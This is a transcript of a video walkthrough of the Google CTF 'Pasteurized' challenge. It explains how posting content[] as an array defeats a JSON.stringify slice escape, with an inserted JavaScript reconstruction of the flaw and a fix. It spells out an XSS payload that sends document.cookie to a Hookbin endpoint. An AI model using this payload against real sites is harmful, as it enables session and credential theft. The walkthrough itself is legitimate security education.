Hello everyone, my name is John Hammond and welcome back to the YouTube video. Today I want to showcase one of the web category challenges from this year's Google CTF, which was online this past weekend. The sun is like right there, so please forgive me if I apparently have a halo on the side of my head.

But before we dive in I need to put out a disclaimer. I had not solved this during the competition, during the capture the flag itself. I'm not that good, first of all, and I didn't spend a whole lot of time on this. It's funny: I think my friends and I opened up the Google CTF and we looked at it for maybe an hour or less, and then we were like, "Okay, we should probably go prepare and keep building challenges for the CTF that we're hosting next month." So, secret spill there, but admittedly I did not spend a ton of time on this. I'd love to showcase more Google CTF stuff for you, but honestly I'm not that smart. I'm still learning, and especially for capture the flags like this, they're legit, man. I still have a lot to learn too.

So I will be showcasing this with the help of write-ups that I have read, and I do want to use that to foot-stomp and emphasize: don't hesitate to read write-ups. We're all trying to learn. The whole point is to get smarter and get better. So I have looked at this more. When I was going through it the first time, from my perspective, I'll showcase the rabbit holes that I fell down, and then, since I put it away and didn't get through to the solution, now that I know it through the write-up I wanted to share that with you. So that's my disclaimer. Anyway, let's dive in.

This is Pasteurized. This is literally the easiest, lowest-point-value challenge that Google CTF had. I still wanted to showcase it for you because there might be some cool and neat and interesting tricks. So let's fire it up.
The challenge says: "It doesn't look secure, I wouldn't put even the littlest secret in here. My source tells me that third parties might have implanted it with their little treats already. Can you prove me right?" So we have this URL. Clicking on this, it looks like Pasteurized, and I pronounce it "paste-urized" because I realize that's kind of the gimmick of this challenge, where you can create a new paste. We could theoretically just type in anything here. So "please subscribe", sure, I'll submit that, and that will apparently render out my input on the page. And I guess that's kind of the idea: there's the numeric value for that specific note or paste that we've got here, and we could share it with TJMike. Interesting. And we can go back. Okay, so I can add in anything we particularly want here.

Since we had that option to share with TJMike, that's oftentimes very similar to a "report to admin"; maybe TJMike is the admin. And if we can input data onto a page and it might be shown again, potentially this web challenge is setting us up for a cross-site scripting attack. If we are reporting it to an admin, maybe we might do some interesting dynamic browser stuff, getting things on the client side of his browser, and maybe he will render some JavaScript, some client-side code that will execute due to cross-site scripting. We could grab some information from his perspective, like grab the admin cookie or view the admin page, or do some other drive-by stuff and bring him along to other pages. Those are all the neat and interesting things we can do with cross-site scripting.

So, as a thought for that, I can try and enter some HTML tags like h1, a big header, and see if that gets rendered out or reflected to me. It looks like it does; that did increase the size here. And we could share that with TJMike just to see what happens.
It says "TJMike will appreciate your paste shortly." Okay, I see a little captcha down here where my face is; let me try and hide that so you can see. It looks like it does need to be kind of put together in the web browser, so doing some tricks might get in the way if we try to automate this or do some other things without going through that captcha. Anyway, since we know we potentially do have some code that could come through here, we could try interesting things like a script tag, and then let's do an alert(1), and a closing script tag, to see if we can run JavaScript code. And that didn't do anything, seemingly, which is weird.

So we could do our actual normal stuff. Let's look at the source code and really see what's going on here. It looks like they actually even reference the source code of this web page. It's hidden, it's not going to be displayed on the web page, but that might be something we could access or go to. So let's go to that, let's download that. Okay, I'm just going to wget this. Let's hop on over to my terminal. I had created a little folder, ctf/googlectf/web, and then one for that challenge, and I've already downloaded the source. Let me clear that out so you get a fresh perspective. There we go. Let me move that source to a source.js, because looking at it in the browser here it looks like it's Express, like Node running JavaScript server-side in the background. So let me go ahead and open that in Sublime Text and let's look through this code.

So we are using the Express framework, that back end inside of JavaScript. It looks like it'll be able to do some parsing things, requiring utilities, which is seemingly local, reCAPTCHA, UUIDs (that must be the note ID or title that we saw) and the data store. Okay, reCAPTCHA stuff, choo choo, it's running the Express engine, it looks like it's going to use EJS for templating and pages, getting static pages.
They say reCAPTCHA needs these; interesting. And then just the data store. Okay, this just looks like the schema, or functions for how we're putting things in the database, what notes we have. I guess it's probably us, and "public" has got to be just about everything. So that's peculiar; nothing weird there that I see that could get in the way, but I mean that's just going to be the database, that's just the data store itself. We create that database, and then we have this little escape_string functionality, which looks like it's going to do some replacing to remove those less-than and greater-than symbols that we might use for some HTML. But it looked like it rendered that out; that was weird. Did it do that when we used the h1 tags?

So we render out the home page. If we POST to it, we need to verify that we actually have a note to use, and we create the note ID, the UUID we saw earlier, out of the database, etc., etc., and redirect to the note ID. Properly escape the note. Okay, so can we not bother with some of these? Do our XSS payloads, our cross-site scripting, will that kind of get in the way? Yeah, okay, so we run that escape_string thing over here and that will replace our less-than and greater-than symbols. That's frustrating and annoying. "Share your paste with TJMike." Okay, so that's us reporting and sending it to the admin, and he will just straight up go to the page. Okay, cool. And there's the source code link; we've got that, and then it just runs. Good enough.

So let me actually look at the page itself once we've shared a note. Why didn't it display our script tags? Let me start with the hello, or the h1 header tags. I'm going to view the source here; I hit Ctrl+U on my keyboard. Oh, it's using DOMPurify. Did we see that in the source code? DOMPurify, purify, purify... that's not in the source code. It's all client-side.
So DOMPurify is a big, well-known sanitization library; it'll help try and purify and clean things out and make sure there's no unneeded and unnecessary and evil and nefarious code. Oh, and there's some client-side stuff here: "fix b/1337", something funky in the source code that could lead to cross-site scripting. What is that, b/1337? Like byte 137? 1337? Can I go to a specific character in Sublime Text? Like, what is 1337? Is that literally where the weirdness is going to be? I guess I can hex edit it. Let me hex edit source.js and go to 1337. What is that, what is it in Python... oh no, yeah, what is 1337 in hex? That's what I'm asking. This is probably a stupid idea; this is probably not useful whatsoever. Five three nine: this guy. Yeah, that's not what that "b" stands for. I don't know and I don't need to worry about it. But something could apparently lead to cross-site scripting. Okay, interesting.

Oh, so this is the replace, or that escape_string function, coming into action here. We can see our greater-than and less-than symbols were replaced with these hex codes. We have our note ID and it uses DOMPurify to sanitize it and clean it. So that's interesting; that will prevent us from using some of the other things we tried, like our script alert(1) script... script, script, please... and it renders that out on the page like this. That doesn't help. Okay, so that's in the way. Maybe we could do peculiar things, because if this is what's actually being put in the page, if we can't use our greater-than and less-than symbols, could we do anything funky to break out of this string
and get our inserted JavaScript code leaking into this section of code here? Maybe we could try to just include a double quote to terminate that string. Let me try that. I have a lot of view-source tabs open that I don't need, so let me close out some of those. We'll just do "please sub", I guess. Yeah, so we would end that string and then we would have a semicolon to denote a new command, and then I guess I'll comment out a message to see if that goes through as well. We have the source code, so we really only should see the... oh, I hit "share with TJMike", my bad. We really should only see those greater-than and less-than symbols replaced, but they also escape our double quotes. Okay.

So, looking at this code, and we're still in the phase of me trying this myself, experimenting with this when I did not know the solution and was going through it cold, I thought maybe I should be finding some weakness in DOMPurify, right? Because if that was the library they were using there, maybe there's a DOMPurify exploit or cross-site scripting vulnerability. And so what you can see here are literally some of my old revisited links where I would take a look at some of the potential vulnerabilities; maybe they could have some cross-site scripting in some older vulnerable versions like 2.0, 2.0.3. And I was like, oh goodness, maybe this is a lead. What do I have to work with? So I thought: what version of DOMPurify are they using in this challenge?
Checking out the version of DOMPurify just by looking at it on the web page, I see github cure53 DOMPurify blob, and maybe that's 2.0.8, and that's not any of the research that I had done previously. I'm looking for a version less than that which might potentially be vulnerable to this thing, and maybe that's still a complete guess due to my research. I also did things like just search for "version" and do other version checks to see if that was really what it was, in case they didn't have that note here in the header. I don't think I actually saw that 2.0.8 originally; I just searched for "version", and when I saw that reference to 2.0.12, I was like, well, okay, I'm way out of luck. That's not going to help me whatsoever.

So at that point, playing the game in real time, I have the classic millennial dilemma of my weak and low attention span. After an hour of maybe fumbling with this, and I didn't have a lead, I was like, all right, I should go do something that's actually productive for me personally. Not that this isn't, but I was like, I should be building things. So I put this away and waited for some write-ups to come out, because I'm always looking forward to Google CTF write-ups, or those for any bigger or legitimate capture the flag competition, to try and see what really cool techniques and stuff are in place here. So again, I say that with my disclaimer and my full frontal honesty and transparency ("full frontal" is not the right word for that). I looked at these write-ups and I saw what really could have been peculiar and interesting there, and it's funny: while I was looking through this I completely glossed right past the solution. This escape_string function, this little thing that they're putting together, is odd and interesting. This comment, "who wants a slice?", is kind of taunting.
It's kind of weird, and it doesn't really match any of the other comments. Maybe you could use that to pick it out, needle in a haystack. But what they do here, aside from this replace line (and I know this replace line kind of sticks out to you naturally, because that's just what you look for in most common capture the flag stuff, or when I do a lot of PHP challenges; JavaScript is kind of an oddball thing for me to see when I look at Express or Node, but I know a lot more cool, legitimate CTFs are using these): put this away, put this away. We know that'll work mentally; it'll be replacing our less-than and greater-than symbols. But this JSON.stringify on our input, this is an oddball thing, and we could research what this does, or we could step through it. It slices out seemingly the first element, like the first character in that iterable, that list, that string particularly, and then it'll go to negative one, so up to the very, very last character in it. If we were to tinker with this, if we were to play with it, maybe we could see it do some peculiar things.

So let me put that over here and I'll put another terminal over here and I'll just run node, right, so I can work with JavaScript locally on my side. If you don't have that on Ubuntu, I think it's sudo apt install nodejs. Let's just create a string like "hello", and there's our string. Now let's try to use some of that syntax that they use, where they use JSON.stringify(unsafe). We can see the normal operation for it: JSON.stringify("hello") will just take... it'll be like a string of the string, so it's including these double quotes here. And if I actually had another quote in here, "hello "john"", you can see that's going to just be escaped.
So great, that's the gimmick and tweak that we fall into. But then they slice it, right? So they go ahead and slice from the first character all the way to just about the last one. So those surrounding quotation marks are removed and all you're left with is that escaped backslash-quote, if you were to use it. So that would get in the way for you. That's important to note. This is the normal functionality, what we've seen, but if we were to do some research on JSON.stringify, you can see some references here, documentation: "The JSON.stringify() method converts a JavaScript object or value to a JSON string." Now this is interesting, because they note a JavaScript object, not just a value. When we're looking at the string that we supplied, like "hello" or our note or anything, that's going to end up being just a regular value; that's going to be a string. Interestingly enough, if you were to pass it an object (and this is literally the first example they show you), it's not going to end up putting those double quotes around it. In fact, it'll do weird things, where it has the curly braces that denote an object in there.

So if we were to tinker with this, let me try and just put together an object. It'd be like a = "please sub" or whatever. So now I don't include the .slice here removing the first and last characters, but you can see the very first character is an open curly brace and the last one is a closing curly brace. So if I were to slice this out, we don't actually have our double quotes escaped out. That's useful for us, right? Because now we could end up maybe potentially passing an object to this little note application, and it could actually have our double quotes in there and escape out of that string that we were trapped inside in the JavaScript that was visible on the web page. So I tried to do this originally. I knew that I could pass... after kind of, again, the illusion is over, right? Our artifice is gone.
We've broken down the fourth wall. We know that we could potentially be... can I please go back? Okay, thank you. We would be sending in data through a variable here in the form with a POST method, and it's going to be named "content". So, knowing that I could maybe pass an object or an HTTP object through to it, how could I do that? That syntax usually means that you'll have to supply some curly or square braces around, or just following after, the name of the variable that you want to make an object.

So I would do this with curl, just to see; I originally just wanted to test this. So let me break out of node and let me curl over to this URL. That will return the page for me, which is nice and fancy, but I do want to POST to this, and it needs to actually have the content being supplied, right? So I will specify -d to denote the variable that I'll pass along, content, or the data that we supply; "content" is the name of that variable. And we'll just include, for a sanity check, "please sub", and this will redirect me to the note. I could very well pass along content with these open and close square braces, content[], and now I know that I'm passing an object. And that seems to take it, and it'll redirect me again to a new note. In curl you could follow redirects with -L, but I think that keeps the POST method in place, and off the top of my head I didn't know how to just POST to the first page and then not POST to the second one. So I thought, okay, curl won't be a good one for me. Let's just fire this up in Python, as kind of my usual knee-jerk reaction: #!/usr/bin/env python. I will import requests and I will use requests.post on that URL, so I'll grab that. I'm using requests because I know I'm going to be using some internet or web functionality, making GET and POST requests to web pages.
So I'll pass the URL there, I'll include data as a dictionary, and content should be the name of that variable. But remember, to pass an object we need to include these curly braces here... or square braces, sorry. So I will go ahead and set that to "please sub", and now let's capture that as a variable and then print out the response from that, r.text, and I'll hit Ctrl+B to run this. I'm using the build view plugin in Sublime Text so I can move this into another tab; I hit Shift+Alt+2 to open that other tab, and I'll mark that as HTML so it's a little bit easier to read and work with. You can see over on that side we do have the page returned to us, and down below, checking out the source code that should be rendered out on the page, "please sub" has these double quotes here, and we're properly broken out of the original quote.

So, knowing that, we could maybe start to inject our own JavaScript. Let's put a semicolon here over in our "please sub" payload, and obviously we want to be running real JavaScript, right? So let's use just an alert(1) as a proof of concept. So it would look like a semicolon there and then our code being injected, and we'll have to remove these other double quotes, so let's have a forward slash, forward slash there to comment that out. If I were to run that, now we should have that in our page with literal JavaScript, and I have the note ID, so I can go visit it in my browser to see if that will actually work for me. Let's go to slash that location, and I have a little proof-of-concept JavaScript alert box. Fantastic, okay.
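The breakout walked through above, as an added example (my reconstruction, not code from the challenge source or from the video): a stand-in for the escape_string() helper, an assumed shape for the inline-script line the note is rendered into, a harness that runs the rendered script the way the victim's browser would, and a hardened variant that keeps JSON.stringify's own quotes instead of slicing them off. The exact template line, the body-parser configuration and the hardened function are assumptions; `pwned()` stands in for the video's alert(1) and the later cookie exfiltration.

```javascript
// Added example (mine, not the challenge's code): reconstructs the
// escape_string() idiom from Pasteurized and shows why an array-valued POST
// body (content[]=...) breaks out of the string literal it is embedded in.

// Reconstruction of the vulnerable helper: JSON-encode, strip the surrounding
// quotes ("who wants a slice?"), then neutralise angle brackets so the
// string cannot close the <script> tag early.
function escapeStringVulnerable(unsafe) {
  return JSON.stringify(unsafe).slice(1, -1)
    .replace(/</g, '\\x3C')
    .replace(/>/g, '\\x3E');
}

// Assumed shape of what the EJS template renders into the page's inline script:
//   const note = "<%- escape_string(note) %>";
function renderScriptVulnerable(content) {
  return `const note = "${escapeStringVulnerable(content)}";`;
}

// Hardened variant (an assumption, not the challenge's fix): coerce to a
// string first and keep JSON.stringify's own quotes. An array or object body
// can then never change the shape of the literal, and the angle-bracket
// escaping still blocks an early </script>.
function renderScriptHardened(content) {
  const literal = JSON.stringify(String(content))
    .replace(/</g, '\\x3C')
    .replace(/>/g, '\\x3E');
  return `const note = ${literal};`;
}

// Run a rendered script body the way the victim's browser would and report
// whether an injected statement executed and what `note` ended up holding.
function execute(js) {
  globalThis.pwnedCalled = false;
  globalThis.pwned = () => { globalThis.pwnedCalled = true; };
  const note = new Function(js + '\nreturn note;')();
  return { pwned: globalThis.pwnedCalled, note };
}

// Payload in the shape the video uses, minus the exfil URL. It carries no
// double quote of its own: the quotes JSON.stringify puts around the array
// element are what close the literal.
const PAYLOAD = ';pwned();//';

// Demo. As a plain string the payload stays inside the literal; as a
// one-element array (what Express' urlencoded parser in extended mode builds
// from content[]=..., assumed to be the challenge's config) it escapes.
console.log(renderScriptVulnerable(PAYLOAD));     // const note = ";pwned();//";
console.log(renderScriptVulnerable([PAYLOAD]));   // const note = "";pwned();//";
console.log(execute(renderScriptVulnerable([PAYLOAD])));
console.log(renderScriptHardened([PAYLOAD]));     // const note = ";pwned();//";
```

The harness uses `new Function` purely to show that the rendered text really is executable JavaScript with the attacker's statement in it; in the challenge the same text lands in a `<script>` block that TJMike's headless browser runs.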
Now we have our JavaScript in place, so that means we could do the real, cool, regular cross-site scripting stuff when we send this over to TJMike, or the admin. What you would normally want to do is capture their cookie. That's the first thing you could always easily reach for, like low-hanging fruit. Maybe you'd have to do weird things like read the admin page or drive him someplace else to turn on a setting; who knows? Let's start with just simply grabbing his cookie and see if that's where the challenge leads us. Again, removing the illusion: we've read write-ups on this, the competition is now over, and that is all we have to do, grab his cookie.

Normally I would do this with sort of a bring-your-own-box, or BYOB, external server that any internet object or other server online could reach and access. So I use a DigitalOcean droplet for something like that, or something you could host up with Google Cloud or AWS or Azure, whatever you want. I'm actually just going to end up doing this with Hookbin. I've seen Hookbin, hookbin.com is right, okay. I've seen RequestBin; I think something weird happened to them. I've seen other ones that do this sort of thing, but this will just be an online service that will wait to catch, capture and then inspect HTTP requests. So you can use this as a really good way to just gather some external cookie or something if you're doing a cross-site scripting attack. It's hookbin.com. I'll create a new endpoint, so I'll take this guy. This is our link, and once we have something that requests that link, we should be able to see all the captured data here if we were to refresh this page. So what I'll do is I'll use my insert section for JavaScript, and I'll create a new DOM object for an image. Super duper easy, right?
I'll use a new Image, and then I'll take that object with the dot selector and I'll supply the source here, so .src, and then we want to include a string value here. But we can't use our double quotes because we're already inside double quotes, and we know that this will escape out our double quotes. So let's just use single quotes here, because JavaScript will handle that nicely. Let's paste in that link and then let's supply a question mark to supply some other variables in there, like a GET request. So I'll say c=, so c could be "cookie" or whatever value name you really want; maybe c keeps it nice and easy for you. And let's just append, or add in with the plus sign, the document.cookie. So when I view this in my browser, maybe I have some cookie set and we would see that request go through in Hookbin. Maybe I don't; maybe we don't see anything. But when we send this to TJMike, or the admin, we'll get his cookie. So that is all we want to do with this attack.

Let me go ahead and post this request. Looks like that has come through; we see our code properly injected here, our new Image source going to that location, commenting out the rest of it. And I'll have this note ID that I can copy and access within my browser. So let me hop over and go to this location. I will actually fire up the network tab so you can see this come through. If I go ahead and paste this in, I make a request to that. There we go. And do I make a request to this location? Looks like I do; that's Hookbin right there. And that was a successful query.
It looks like that responded, or didn't actually give me anything back; totally fine. Maybe it was just a true thing. But that was able to post some data there. So we know that this should work, because our local test did run just fine here. If I were to report this to TJMike, we should be able to see his result, his cookie, his data over on that Hookbin. If we go back to the Hookbin and I refresh this page, do I see my request? Yes, I do. Perfect. So this came from me accessing it locally; you can see my web browser there, and my query string, that c variable, didn't actually have any cookie or anything associated with it. No problem, that's fine. We have our proof of concept.

Now let's share this with TJMike. Looks like that all went through, and "TJMike will appreciate your paste shortly." So let's hop back on over to Hookbin, refresh this page and see if we have anything new. I see something come through, which might be a different responder, and it is: I can see the headless Chrome user agent there, and we have our query string, our secret, "CTF express to troubles". Nice, that's a good flag. So that's it. There is our flag. That was the technique, that was all that we needed to do. We could go ahead and submit that. I know the game's over now, but cool, whatever, we made 50 points on the easiest challenge that Google CTF had. But hey, hopefully that was a cool learning point and maybe you had some fun with it if you hadn't seen this sort of thing before. That was a peculiar thing for me. Admittedly, I wish I had spent more time on it. You know, every time a CTF comes by we kind of regret: oh man, I wish I did more for that.
I wish I tried harder, I wish I kept banging my head against the wall, because it would have been really, really cool to get that in the moment. But I don't want that to take away from the value of reading write-ups. So with that, shout-out and kudos to all the incredible people that release write-ups for these sorts of things. You guys are also incredible, prolific, valuable members of the community. Obviously, obviously you all are, but seeing everyone sharing the knowledge and helping everyone grow is a super cool thing. So shout-out to everyone that wrote a write-up, and I'm very excited to read more of those for different challenges on Google CTF. And maybe I can showcase another if you guys thought this was valuable. I don't want this to be completely useless, because obviously write-ups out there already exist, but maybe it's cool to see a walkthrough of it in a video format and see every single step and every single action that has to be taken and done for all that to work, and see more of the thought process in real time. So I hope that's cool.

All right, that's enough of me jabbering, and thank you so much for watching. I hope you guys enjoyed this video. If you did, please do the YouTube algorithm things; you know, I'm super duper grateful if you could hit that like button, if you could maybe type something in the comments, whatever, I'd be grateful. If you could please subscribe, thank you, thank you, thank you. If you want to go above the call, if you want to go way above what is necessary, I would be incredibly flattered if you could drop a donation, and I always appreciate your support: Patreon, PayPal, those are links in the description. I just tweaked up some of the Patreon tiers, so I'd be super duper flattered to see your love and support. So thank you, thank you. All right, everybody, that's the end of the video. I'll see you tomorrow for some other cool stuff. Take care. I love you. Bye.